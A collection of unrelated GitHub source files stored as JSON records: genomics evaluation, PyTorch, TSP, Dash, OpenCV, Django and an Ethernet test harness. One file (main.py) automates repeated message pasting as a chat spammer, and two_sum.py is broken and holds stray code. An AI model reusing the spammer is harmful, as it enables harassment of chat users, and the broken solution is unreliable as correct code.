evalMetrics(distDir1,xyzDir,evalfileDir,hicfilename,alpha1)\n    evalMetrics(distDir2,xyzDir,evalfileDir,hicfilename,alpha2)\n\"\"\"\n\n\"\"\"\nsimulate Hi-C data evaluate\n'_NeRV_test2000_0.9','NeRV','LargeVis','3DMax','ShNeigh1','miniMDS','ShRec3D','EVR','LorDG','GEM'\n\nfor xyzname in ['GEM']:\n    distDir1=\"/home/ghaiyan/project/NeRV-3D/chrtest/NeRV_3d_test/test2000_0.3.dist\"\n    distDir2=\"/home/ghaiyan/project/NeRV-3D/chrtest/NeRV_3d_test/test2000_0.9.dist\"\n    xyzDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/\"+xyzname+\".xyz\"\n    evalfileDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/evalueCompare_test.txt\"\n    hicfilename=\"/home/ghaiyan/project/NeRV-3D/chrtest/test.hic\"\n    trueevalfileDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/evalueComparetrue_test.txt\"\n    truexyzDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/test2000.xyz\"\n    alpha1=0.3\n    alpha2=0.9\n    evalMetrics(distDir1,xyzDir,evalfileDir,hicfilename,alpha1)\n    evalMetrics(distDir2,xyzDir,evalfileDir,hicfilename,alpha2)\n    evalTrue(truexyzDir,xyzDir,trueevalfileDir,hicfilename,alpha1)\n\"\"\"\n\n\"\"\"\ntrue Hi-C data in a high resolution \n\"\"\"\n\ndistDir1=\"/data1/ghy_data/IMR90/3DResults/NeRV_3D/chr20_5000_0.3.dist\"\nxyzDir=\"/data1/ghy_data/IMR90/3DResults/NeRV-3D-DV/chr20/5000/highresplusnan.xyz\"\nevalfileDir=\"/data1/ghy_data/IMR90/3DResults/NeRV-3D-DV/chr20/5000/evalueCompare_test.txt\"\nhicfilename=\"/home/ghaiyan/project/NeRV-3D/chrtest/test.hic\"\nalpha1=0.3\nevalMetrics(distDir1,xyzDir,evalfileDir,hicfilename,alpha1)\n\n\n\n","repo_name":"ghaiyan/NeRV-3D-DC","sub_path":"src/evalMetrics.py","file_name":"evalMetrics.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"73174043686","text":"import logging\n\nimport numpy as np\nimport torch\n\nfrom .base import Transformer\n\n\nclass Affine(Transformer):\n \"\"\" Use an affine transformation function to align the pairs of cells.\n\n The affine function is of the form ``f(x) = Wx + b``, where ``W`` and ``b``\n are the learnable weights. ``W`` has the shape (genes, genes) and ``b``\n (the bias term) has shape (genes,).\n\n Parameters\n ----------\n optim : {'adam', 'sgd'}\n Which torch optimizer to use.\n\n lr : float\n Learning rate to use in gradient descent.\n\n epochs : int\n Number of iterations to run gradient descent.\n \"\"\"\n def __init__(self, optim='adam', lr=1e-3, epochs=1000):\n self.optim = optim\n self.lr = lr\n self.epochs = epochs\n super().__init__()\n\n def fit(self, A, B):\n log = logging.getLogger(__name__)\n d = A.shape[1]\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n log.info(f'Using device {device}')\n A = torch.from_numpy(A).float().to(device)\n B = torch.from_numpy(B).float().to(device)\n f = torch.nn.Sequential()\n f.add_module('lin', torch.nn.Linear(d, d, bias=True))\n f.to(device)\n if self.optim == 'adam':\n optimizer = torch.optim.Adam(f.parameters(), lr=self.lr)\n else:\n optimizer = torch.optim.SGD(f.parameters(), lr=self.lr,\n momentum=0.9, nesterov=True)\n f.train()\n for e in range(self.epochs):\n optimizer.zero_grad()\n loss = torch.mean(torch.norm(f(A) - B, p=2, dim=1)**2)\n if e % 100 == 0:\n log.info(f'\\tEpoch: {e}/{self.epochs}, loss: {loss.item()}')\n loss.backward()\n optimizer.step()\n # theta is the augmented matrix wich includes weights W and bias in\n # a single matrix\n theta = np.zeros((d + 1, d + 1))\n theta[:d, :d] = f[0].weight.data.cpu().numpy()\n theta[:d, -1] = f[0].bias.data.cpu().numpy()\n theta[-1, -1] = 1.\n\n model = {\n 'theta': theta,\n }\n return model\n\n def transform(self, model, A):\n d = A.shape[1]\n W = model['theta'][:d, :d]\n bias = model['theta'][:d, -1]\n return np.dot(W, A.T).T + bias\n\n def chain(self, model, step_model, step_number):\n # Affine functions can be composed easily when represented in their\n # augmented matrix form, simply left multiply their (augmented)\n # transformation matrices by each other.\n if model is None:\n return step_model\n else:\n model['theta'] = np.dot(step_model['theta'],\n model['theta'])\n return model\n\n def finalize(self, model, A_orig, A_final):\n # Since we've been updating the overal model in the chain function,\n # we don't need to do anything here.\n return model\n","repo_name":"AmirAlavi/scipr","sub_path":"scipr/transform/affine.py","file_name":"affine.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"5812760332","text":"import math\nfrom copy import deepcopy\nimport networkx as nx\nimport numpy as np\nimport sys\ninf = 10**10\n\nclass Graph:\n def __init__(self, filename):\n self.filename = filename\n self.load_from_file()\n\n def parse_GEO(self, node):\n i, x, y = node\n i = int(i)\n PI = 3.141592\n deg = int(x)\n min = x - deg\n lat = PI*(deg + 5.0*min/3.0)/180.0\n deg = int(y)\n min = y - deg\n lon = PI*(deg + 5.0*min/3.0)/180.0\n return i, lat, lon\n\n def get_GEO_distance(self, node1, node2):\n i, lat_i, lon_i = node1\n j, lat_j, lon_j = node2\n i, j = int(i)-1, int(j)-1\n R = 6378.388\n q1 = math.cos(lon_i-lon_j)\n q2 = math.cos(lat_i-lat_j)\n q3 = math.cos(lat_i+lat_j)\n d = int(R * math.acos(0.5*((1.0+q1)*q2 - (1.0-q1)*q3)) + 1.0)\n 
return i, j, d\n\n def get_EUV_2D_distance(self, node1, node2):\n i, x_i, y_i = node1\n j, x_j, y_j = node2\n i, j = int(i)-1, int(j)-1\n xd = x_i-x_j\n yd = y_i-y_j\n d = math.sqrt((xd*xd+yd*yd))\n return i, j, int(d+0.5)\n\n def load_from_file(self):\n nodes_list = []\n params = {}\n with open(self.filename, \"r\") as f:\n line = f.readline()\n while ':' in line:\n key, value = line.split(':')\n params[key] = value.strip()\n line = f.readline()\n line = f.readline()\n while 'EOF' not in line:\n n, x, y = line.strip().split(' ')\n n, x, y = n.strip(), x.strip(), y.strip()\n n, x, y = float(n), float(x), float(y)\n if params['EDGE_WEIGHT_TYPE'] == 'GEO':\n n, x, y = self.parse_GEO((n, x, y))\n nodes_list.append([n, x, y])\n line = f.readline()\n\n dim = int(params['DIMENSION'])\n graph = [[0 for i in range(dim)] for j in range(dim)]\n\n self.city = params['NAME']\n\n if params['EDGE_WEIGHT_TYPE'] == 'EUC_2D':\n dist_func = self.get_EUV_2D_distance\n else:\n dist_func = self.get_GEO_distance\n\n for node1 in nodes_list:\n for node2 in nodes_list:\n i, j, distance = dist_func(node1, node2)\n if i == j:\n distance = inf\n graph[i][j] = distance\n graph[j][i] = distance\n\n graph = np.array(graph)\n self.nxG = nx.from_numpy_matrix(graph)\n for i in range(len(nodes_list)):\n self.nxG.remove_edge(i,i)\n self.G = graph\n\n def copy(self):\n return deepcopy(self.G)\n\n def __repr__(self):\n return repr(self.G)","repo_name":"lzx3x3/Algorithm-CSE6140","sub_path":"Traveling_Sales_Person/Code/helpers/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19381174216","text":"import datetime\r\nimport time\r\nimport pyautogui\r\nimport pyperclip\r\n\r\ntimes_looping = input('times to repeat: ')\r\nmsg = input('msg: ')\r\npyperclip.copy(msg)\r\ntime_to_wait = input('time to wait in seconds: ')\r\n\r\nprint('you got 10 seconds')\r\ntime.sleep(10)\r\n\r\nst = t = time.time()\r\n\r\nfor i in range (int(times_looping)):\r\n pyautogui.hotkey('ctrl', 'v')\r\n pyautogui.press(\"return\")\r\n time.sleep(float(time_to_wait))\r\n\r\net = time.time()\r\n\r\nprint('done')\r\nprint(f\"finished in {str(datetime.timedelta(seconds=(et-st)))}\")\r\nprint(f\"{(int(times_looping)/(et-st))} messages per second\")","repo_name":"noamavned/spammer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6771462972","text":"# Dash components, html, and dash tables\nimport dash_core_components as dcc\nimport dash_html_components as html\n\nimport plotly.express as px \nimport data\nfrom PIL import Image\n\n\nteamCountryLayout = html.Div([\n html.Div([\n html.H1('Pelaajien kotimaat joukkuettain',\n style={'textAlign':'center'}),\n dcc.Dropdown(id='team',\n options=[\n {\"label\": \"ANA\", \"value\": \"ANA\"},\n {\"label\": \"ARI\", \"value\": \"ARI\"},\n {\"label\": \"BOS\", \"value\": \"BOS\"},\n {\"label\": \"BUF\", \"value\": \"BUF\"},\n {\"label\": \"CAR\", \"value\": \"CAR\"},\n {\"label\": \"CGY\", \"value\": \"CGY\"},\n {\"label\": \"CBJ\", \"value\": \"CBJ\"},\n {\"label\": \"COL\", \"value\": \"COL\"},\n {\"label\": \"DAL\", \"value\": \"DAL\"},\n {\"label\": \"DET\", \"value\": \"DET\"},\n {\"label\": \"EDM\", \"value\": \"EDM\"},\n {\"label\": \"FLA\", \"value\": \"FLA\"},\n {\"label\": \"L.A\", \"value\": \"L.A\"},\n {\"label\": \"MIN\", \"value\": 
\"MIN\"},\n {\"label\": \"MTL\", \"value\": \"MTL\"},\n {\"label\": \"NSH\", \"value\": \"NSH\"},\n {\"label\": \"N.J\", \"value\": \"N.J\"},\n {\"label\": \"NYI\", \"value\": \"NYI\"},\n {\"label\": \"NYR\", \"value\": \"NYR\"},\n {\"label\": \"OTT\", \"value\": \"OTT\"},\n {\"label\": \"PHI\", \"value\": \"PHI\"},\n {\"label\": \"PIT\", \"value\": \"PIT\"},\n {\"label\": \"S.J\", \"value\": \"S.J\"},\n {\"label\": \"STL\", \"value\": \"STL\"},\n {\"label\": \"T.B\", \"value\": \"T.B\"},\n {\"label\": \"TOR\", \"value\": \"TOR\"},\n {\"label\": \"VAN\", \"value\": \"VAN\"},\n {\"label\": \"VGK\", \"value\": \"VGK\"},\n {\"label\": \"WPG\", \"value\": \"WPG\"},\n {\"label\": \"WSH\", \"value\": \"WSH\"},],\n multi=False,\n value=\"ANA\",\n style={'width': \"40%\"}\n ),\n dcc.Graph(id='map', figure={}),\n \n ]),\n html.Div([\n dcc.Graph(id='pie', figure={})\n ])\n])\n\n\npointsLayout = html.Div([\n html.H1('Kaikkien aikojen pistepörssin top 50',\n style={'textAlign':'center'}),\n\n dcc.Dropdown(id='pointsDropdown',\n options=[\n {\"label\": \"P\", \"value\": \"P\"},\n {\"label\": \"G\", \"value\": \"G\"},\n {\"label\": \"A\", \"value\": \"A\"},\n {\"label\": \"PIM\", \"value\": \"PIM\"},\n {\"label\": \"PPG\", \"value\": \"PPG\"},\n {\"label\": \"SHG\", \"value\": \"SHG\"},\n {\"label\": \"SHOTS\", \"value\": \"SHOTS\"},],\n multi=False,\n value=\"G\",\n style={'width': \"40%\"}\n ),\n dcc.Graph(id='pointsGraph', figure={}),\n dcc.Graph(id='pointsScatter', figure={}),\n \n\n])\n\nteamsLayout = html.Div([\n html.H1('TEAM 1',\n style={'textAlign':'center'}),\n html.H5('X:'),\n dcc.Dropdown(id='teamDropdownX',\n options=[\n {\"label\": \"SF\", \"value\": \"SF\"},\n {\"label\": \"SA\", \"value\": \"SA\"},\n {\"label\": \"GF\", \"value\": \"GF\"},\n {\"label\": \"GA\", \"value\": \"GA\"},\n {\"label\": \"SH%\", \"value\": \"SH%\"},\n {\"label\": \"SV%\", \"value\": \"SV%\"},],\n multi=False,\n value=\"SF\",\n style={'width': \"40%\"}\n ),\n html.H5('Y:'),\n dcc.Dropdown(id='teamDropdownY',\n options=[\n {\"label\": \"SF\", \"value\": \"SF\"},\n {\"label\": \"SA\", \"value\": \"SA\"},\n {\"label\": \"GF\", \"value\": \"GF\"},\n {\"label\": \"GA\", \"value\": \"GA\"},\n {\"label\": \"SH%\", \"value\": \"SH%\"},\n {\"label\": \"SV%\", \"value\": \"SV%\"},],\n multi=False,\n value=\"SA\",\n style={'width': \"40%\"}\n ),\n dcc.Graph(id='teamScatter', figure={}),\n\n \n dcc.Graph(id='teamGFScatter', figure={}),\n html.H5('Kausi:',\n style={'textAlign':'center'}),\n dcc.Slider(\n id='slider',\n step=None,\n min=2016,\n max=2020,\n marks={\n \n 2016: '2016-2017',\n 2017: '2017-2018',\n 2018: '2018-2019',\n 2019: '2019-2020',\n 2020: '2020-2021'\n },\n value=2020,\n ), \n \n\n html.H4('A team’s GF% is their goals-for percentage, representing their share of all goals scored at even-strength. If a team scores three goals and gives up two goals against, they have a goal-for percentage of 60%.But corsica also calculates each team’s expected goals-for percentage, which is the same as above but considers only xG and not actual goals. 
A team might generate 2.75 xG in a game and surrender 2.25 xG against, giving them an xGF% of 55%.This graph compares actual GF% (reality) and xGF% (expectation) to see how a team is performing relative to what we’d expect.'\n )\n \n \n])","repo_name":"Baasii/Data-Visualization","sub_path":"layouts.py","file_name":"layouts.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2119656642","text":"import cv2\nimport numpy as np\n\n#read image\nimg = cv2.imread(\"./noise.png\")\ncv2.imshow(\"img\",img)\n\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"gray\",gray)\n\nfor i in range(0,3):\n eroded = cv2.erode(gray.copy(),None,iterations=i+1)\n cv2.imshow(\"eroded {}\".format(i+1),eroded)\n\nfor i in range(0,3):\n dilate = cv2.dilate(gray.copy(),None,iterations=i+1)\n cv2.imshow(\"dilate {}\".format(i+1),dilate)\n\ncv2.destroyAllWindows()\n\ncv2.imshow(\"gray\",gray)\n\n\nkernelSize = [(3,3),(5,5),(7,7)]\n\nfor k in kernelSize:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,k)\n opening = cv2.morphologyEx(gray,cv2.MORPH_OPEN,kernel)\n cv2.imshow(\"opening {}{}\".format(k[0],k[1]),opening)\n\n\nfor k in kernelSize:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,k)\n closing = cv2.morphologyEx(gray,cv2.MORPH_CLOSE,kernel)\n cv2.imshow(\"clossing {}{}\".format(k[0],k[1]),closing)\n\nfor k in kernelSize:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,k)\n gradient = cv2.morphologyEx(gray,cv2.MORPH_GRADIENT,kernel)\n cv2.imshow(\"gradient {}{}\".format(k[0],k[1]),gradient)\n\n\nk = cv2.waitKey(0) & 0xFF\n\n#pres ESC to exit\nif k==27:\n cv2.destroyAllWindows()\n\n#press 's' to save and exit\nelif k == ord(\"s\"):\n cv2.imwrite(\"newImage.jpg\",img)\n cv2.destroyAllWindows()","repo_name":"girishalwani/OpenCV-Basics","sub_path":"Part_14_morphological/morpho.py","file_name":"morpho.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1818494997","text":"class Solution:\n def binarySearch(item, nums):\n left = 0\n right = len(nums)\n\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] == item:\n return (True, mid)\n else:\n if nums[mid] > item:\n right = mid - 1\n else:\n left = mid + 1\n return False, -1\n\n\n def twoSum(self, nums ,target):\n for i in range(len(nums)):\n first_part = nums[i]\n second_part = target - first_part\n found, index = self.binarySearch(second_part, nums)\n if found and index != i:\n return [i, index]\n\n\n\n\nif __name__ == '__main__':\n alist = input()\n target_sum = int(input())\n two_sum = Solution()\n print(two_sum.twoSum(alist, target_sum))\n\n ten_power1 = 0\n num1 = 0\n while l1.next != None:\n num1 = num1 + (l1.val * (10 ** ten_power1))\n ten_power1 += 1\n l1.next = next\n\n ten_power2 = 0\n num2 = 0\n while l2.next != None:\n num2 = num2 + (l2.val * (10 ** ten_power2))\n ten_power2 += 1\n l2.next = next\n\n return (num1 + num2)","repo_name":"patell11/DataStructuresAndAlgorithms_SanDiego","sub_path":"Practice/Leet_Code/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73482286245","text":"from django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.dispatch import receiver\nfrom .models import Profile,Follow\n\n\nuser = User.objects.filter(username 
= 'charity').first()\n\n@receiver(post_save,sender=User)\ndef create_profile(sender,instance,created ,**kwargs):\n    if created:\n        Profile.objects.create(user=instance)\n        # make new user follow admin in order to see posts in their timeline\n        foll = Follow.objects.create(account = user ,follower= instance)\n        foll.save()\n\n\n\n\n@receiver(post_save,sender=User)\ndef save_profile(sender,instance,**kwargs):\n    instance.profile.save()\n\n# @receiver(post_save,sender=User)\n# def save_follow(sender,instance,**kwargs):\n#     instance.follower.save()\n","repo_name":"charity-bit/Instagram-Clone","sub_path":"instagram/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"37288334835","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom food.models import *\nfrom food.serializers import *\n\n\nclass JSONResponse(HttpResponse):\n\t\"\"\"\n\tAn HttpResponse that renders its content into JSON.\n\t\"\"\"\n\tdef __init__(self, data, **kwargs):\n\t\tcontent = JSONRenderer().render(data)\n\t\tkwargs['content_type'] = 'application/json'\n\t\tsuper(JSONResponse, self).__init__(content, **kwargs)\n\n\n@csrf_exempt\ndef food_list(request):\n\t\"\"\"\n\tList all food, or create a new food.\n\t\"\"\"\n\tif request.method == 'GET':\n\t\tfood = Food.objects.all()\n\t\tserializer = FoodSerializer(food, many=True)\n\t\treturn JSONResponse(serializer.data)\n\n\telif request.method == 'POST':\n\t\tdata = JSONParser().parse(request)\n\t\tserializer = FoodSerializer(data=data)\n\t\tif serializer.is_valid():\n\t\t\tserializer.save()\n\t\t\treturn JSONResponse(serializer.data, status=201)\n\t\treturn JSONResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef food_detail(request, pk):\n    \"\"\"\n    Retrieve, update or delete a food.\n    \"\"\"\n    try:\n        food = Food.objects.get(pk=pk)\n    except Food.DoesNotExist:\n        return HttpResponse(status=404)\n\n    if request.method == 'GET':\n        serializer = FoodSerializer(food)\n        return JSONResponse(serializer.data)\n\n    elif request.method == 'PUT':\n        data = JSONParser().parse(request)\n        serializer = FoodSerializer(food, data=data)\n        if serializer.is_valid():\n            serializer.save()\n            return JSONResponse(serializer.data)\n        return JSONResponse(serializer.errors, status=400)\n\n    elif request.method == 'DELETE':\n        food.delete()\n        return HttpResponse(status=204)\n\n\n","repo_name":"Bohdan-Anderson/food","sub_path":"application/food/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"26789746345","text":"import logging\nimport signal\nimport time\nimport datetime\n# import random\nfrom threading import Thread, Event  # , Lock, Condition\nfrom array import array\nimport struct\n\nimport numpy as np\n\nfrom basil.dut import Dut\nfrom basil.HL.RegisterHardwareLayer import RegisterHardwareLayer\n\nconf = '''\nname : test_eth\nversion : 1.0\n\ntransfer_layer:\n  - name  : ETH\n    type  : SiTcp\n    init:\n        ip : \"192.168.10.16\"\n        udp_port : 4660\n        tcp_port : 24\n        tcp_connection : True\n        tcp_to_bus : True  # if True, use TCP to BUS; if False, UDP (RBCP) to BUS\n\nhw_drivers:\n  - name      : SITCP_FIFO\n    type      : sitcp_fifo\n    interface : ETH\n\n  - name      : REGISTERS\n    type
      : test_eth\n    interface : ETH\n    base_addr : 0x0\n\n'''\n\nstop_thread = False\n\n\nclass test_eth(RegisterHardwareLayer):\n    '''Register Hardware Layer.\n\n    Implementation of advanced register operations.\n    '''\n    _registers = {\n        'RESET': {'descr': {'addr': 0, 'size': 8, 'properties': ['writeonly']}},\n        'VERSION': {'descr': {'addr': 0, 'size': 8, 'properties': ['readonly']}},\n        'SETUP': {'default': 0, 'descr': {'addr': 1, 'size': 8, 'offset': 0}},\n        'TEST_DATA': {'descr': {'addr': 2, 'size': 64, 'offset': 0}},\n        'BUS_WRITE_CNT': {'descr': {'addr': 10, 'size': 32, 'offset': 0}},\n        'TCP_WRITE_DLY': {'default': 0, 'descr': {'addr': 14, 'size': 16, 'offset': 0}},\n        'TCP_WRITE_CNT': {'descr': {'addr': 16, 'size': 64, 'offset': 0, 'properties': ['readonly']}},\n        'TCP_FAILED_WRITE_CNT': {'descr': {'addr': 24, 'size': 64, 'offset': 0, 'properties': ['readonly']}},\n        'TCP_RECV_WRITE_CNT': {'descr': {'addr': 32, 'size': 64, 'offset': 0, 'properties': ['readonly']}}\n    }\n\n\nclass Test(object):\n    def __init__(self):\n        self.dut = Dut(conf)\n        self.dut.init()\n        # fw_version = dut['ETH'].read(0x0000, 1)[0]\n        logging.info(\"Firmware version: %s\" % self.dut['REGISTERS'].VERSION)\n\n        signal.signal(signal.SIGINT, self.signal_handler)\n        logging.info('Press Ctrl-C to stop')\n\n        self.stop_thread = Event()\n        self.total_tcp_err_cnt = 0\n\n    def signal_handler(self, signum, frame):\n        logging.info('Pressed Ctrl-C...')\n        self.dut['REGISTERS'].TCP_WRITE_DLY = 0  # no TCP data\n        self.time_stop = time.time()\n        self.stop_thread.set()\n        signal.signal(signal.SIGINT, signal.SIG_DFL)  # setting default handler\n\n    def start(self, test_tcp=True, test_bus=True, tcp_write_delay=6, monitor_interval=1.0, deadline=None):\n        if not test_tcp and not test_bus:\n            return\n        self.test_tcp = test_tcp\n        self.test_bus = test_bus\n        # reset registers\n        self.dut['REGISTERS'].RESET\n        # setup register values\n        # Monitor\n        self.monitor_delay = monitor_interval  # Speed of displaying network speed\n        # TCP\n        self.tcp_readout_delay = 0.1  # Delay between reading TCP buffer\n        self.dut['REGISTERS'].TCP_WRITE_DLY = 0  # no TCP data\n        self.time_start = time.time()\n        self.total_tcp_err_cnt = 0\n        self.total_tcp_data_words_read = 0\n        self.tcp_exception_cnt = 0\n        self.tcp_read_speeds = None\n        # BUS\n        self.bus_readout_delay = 0.0  # Delay between reading/writing to BUS\n        self.total_bus_err_cnt = 0\n        self.total_bus_read_write_cnt = 0\n        self.bus_exception_cnt = 0\n        self.bus_read_write_speeds = None\n        # initializing threads\n        self.stop_thread.clear()\n        self.mon_t = Thread(target=self.monitor, name='Monitor thread', kwargs={})\n        self.mon_t.daemon = True\n        self.mon_t.start()\n        if test_tcp:\n            self.tcp_t = Thread(target=self.tcp_read, name='TCP thread', kwargs={})\n            self.tcp_t.daemon = True\n            self.tcp_t.start()\n        if test_bus:\n            self.bus_t = Thread(target=self.bus_read_write, name='BUS thread', kwargs={})\n            self.bus_t.daemon = True\n            self.bus_t.start()\n        if test_tcp:\n            self.dut['REGISTERS'].TCP_WRITE_DLY = tcp_write_delay  # set TCP write delay: 1 equivalent to write data every clock cycle (1/133MHz=0.0075us=7.5ns)\n        self.time_start = time.time()\n        self.time_stop = self.time_start + 1.0\n        # while loop for signal handler\n        while not self.stop_thread.wait(0.05):\n            if deadline and self.time_start + deadline < time.time():\n                self.signal_handler(None, None)\n        self.mon_t.join()\n        self.mon_t = None\n        logging.info(\"Stopped Monitor thread\")\n        if test_tcp:\n            self.tcp_t.join()\n            self.tcp_t = None\n            logging.info(\"Stopped TCP thread\")\n        if test_bus:\n            self.bus_t.join()\n            self.bus_t =
None\n logging.info(\"Stopped BUS thread\")\n\n # some statistics\n logging.info(\"Total time: %s\" % (str(datetime.timedelta(seconds=self.time_stop - self.time_start))))\n if test_tcp:\n logging.info(\"=== TCP transfer statistics ===\")\n logging.info(\"TCP data error counter: %d\" % self.total_tcp_err_cnt)\n logging.info(\"TCP exception counter: %d\" % self.tcp_exception_cnt)\n logging.info(\"TCP write busy counter: %d\" % self.dut['REGISTERS'].TCP_FAILED_WRITE_CNT)\n logging.info(\"TCP data words: read: %d, expected: %d\" % (self.dut['REGISTERS'].TCP_WRITE_CNT * 4 + self.dut['REGISTERS'].TCP_RECV_WRITE_CNT, self.total_tcp_data_words_read * 4))\n if self.total_tcp_data_words_read * 4 / 10.0**6 > 1000000:\n logging.info(\"Total amount transmitted: %.2f TB\" % (self.total_tcp_data_words_read * 4 / 10.0**12))\n elif self.total_tcp_data_words_read * 4 / 10.0**6 > 1000:\n logging.info(\"Total amount transmitted: %.2f GB\" % (self.total_tcp_data_words_read * 4 / 10.0**9))\n else:\n logging.info(\"Total amount transmitted: %.2f MB\" % (self.total_tcp_data_words_read * 4 / 10.0**6))\n total_tcp_avg_read_speed = self.total_tcp_data_words_read * 32 / (self.time_stop - self.time_start) / 10.0**6\n if total_tcp_avg_read_speed < 1.0:\n logging.info(\"Total average TCP read speed: %.2f kbit/s\" % (total_tcp_avg_read_speed * 10**3))\n else:\n logging.info(\"Total average TCP read speed: %.2f Mbit/s\" % (total_tcp_avg_read_speed))\n if self.tcp_read_speeds:\n if np.average(self.tcp_read_speeds) < 1.0:\n logging.info(\"TCP read speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f kbit/s\" % (np.min(self.tcp_read_speeds) * 10**3, np.median(self.tcp_read_speeds) * 10**3, np.average(self.tcp_read_speeds) * 10**3, np.max(self.tcp_read_speeds) * 10**3))\n else:\n logging.info(\"TCP read speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f Mbit/s\" % (np.min(self.tcp_read_speeds), np.median(self.tcp_read_speeds), np.average(self.tcp_read_speeds), np.max(self.tcp_read_speeds)))\n\n if test_bus:\n logging.info(\"=== BUS transfer statistics ===\")\n logging.info(\"BUS data error counter: %d\" % self.total_bus_err_cnt)\n logging.info(\"BUS exception counter: %d\" % self.bus_exception_cnt)\n logging.info(\"BUS read/write counter: read: %d, expected: %d\" % (self.dut['REGISTERS'].BUS_WRITE_CNT, self.total_bus_read_write_cnt * 8))\n if self.total_bus_read_write_cnt * 8 / 10.0**6 > 1000000:\n logging.info(\"Total amount transmitted: %.2f TB\" % (self.total_bus_read_write_cnt * 8 / 10.0**12))\n elif self.total_bus_read_write_cnt * 8 / 10.0**6 > 1000:\n logging.info(\"Total amount transmitted: %.2f GB\" % (self.total_bus_read_write_cnt * 8 / 10.0**9))\n else:\n logging.info(\"Total amount transmitted: %.2f MB\" % (self.total_bus_read_write_cnt * 8 / 10.0**6))\n total_bus_avg_read_speed = self.total_bus_read_write_cnt * 64 / (self.time_stop - self.time_start) / 10.0**6\n if total_bus_avg_read_speed < 1.0:\n logging.info(\"Total average BUS read/write speed: %.2f kbit/s\" % (total_bus_avg_read_speed * 10**3))\n else:\n logging.info(\"Total average BUS read/write speed: %.2f Mbit/s\" % (total_bus_avg_read_speed))\n if self.bus_read_write_speeds:\n if np.average(self.bus_read_write_speeds) < 1.0:\n logging.info(\"BUS read/write speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f kbit/s\" % (np.min(self.bus_read_write_speeds) * 10**3, np.median(self.bus_read_write_speeds) * 10**3, np.average(self.bus_read_write_speeds) * 10**3, np.max(self.bus_read_write_speeds) * 10**3))\n else:\n logging.info(\"BUS read/write speed 
(min/median/average/max): %.2f/%.2f/%.2f/%.2f Mbit/s\" % (np.min(self.bus_read_write_speeds), np.median(self.bus_read_write_speeds), np.average(self.bus_read_write_speeds), np.max(self.bus_read_write_speeds)))\n\n # close DUT\n self.dut.close()\n\n def monitor(self):\n logging.info(\"Started Monitor thread\")\n time_read = time.time()\n last_total_tcp_data_words_read = 0\n last_total_bus_read_write_cnt = 0\n while not self.stop_thread.wait(max(0.0, self.monitor_delay - time_read + time.time())):\n tmp_time_read = time.time()\n tmp_total_tcp_data_words_read = self.total_tcp_data_words_read\n tmp_total_bus_read_write_cnt = self.total_bus_read_write_cnt\n if self.test_tcp:\n tcp_read_speed = (tmp_total_tcp_data_words_read - last_total_tcp_data_words_read) * 32 / (tmp_time_read - time_read) / 10**6\n if self.tcp_read_speeds is None: # add on second iteration\n self.tcp_read_speeds = []\n else:\n self.tcp_read_speeds.append(tcp_read_speed)\n if tcp_read_speed < 1.0:\n logging.info(\"TCP read speed: %0.2f kbit/s\" % (tcp_read_speed * 10**3))\n else:\n logging.info(\"TCP read speed: %0.2f Mbit/s\" % tcp_read_speed)\n if self.test_bus:\n bus_read_write_speed = (tmp_total_bus_read_write_cnt - last_total_bus_read_write_cnt) * 64 / (tmp_time_read - time_read) / 10**6\n if self.bus_read_write_speeds is None: # add on second iteration\n self.bus_read_write_speeds = []\n else:\n self.bus_read_write_speeds.append(bus_read_write_speed)\n if bus_read_write_speed < 1.0:\n logging.info(\"BUS read/write speed: %0.2f kbit/s\" % (bus_read_write_speed * 10**3))\n else:\n logging.info(\"BUS read/write speed: %0.2f Mbit/s\" % bus_read_write_speed)\n time_read = tmp_time_read\n last_total_tcp_data_words_read = tmp_total_tcp_data_words_read\n last_total_bus_read_write_cnt = tmp_total_bus_read_write_cnt\n if self.total_bus_err_cnt > 10 or self.total_tcp_err_cnt > 10:\n self.stop_thread.set()\n\n logging.info(\"Stopping Monitor thread...\")\n\n def tcp_read(self):\n logging.info(\"Started TCP thread\")\n fifo_data_last_value = -1\n fifo_was_empty = 0\n time_read = time.time()\n while not self.stop_thread.wait(max(0.0, self.tcp_readout_delay - time_read + time.time())) or fifo_was_empty < 1:\n time_read = time.time()\n try:\n 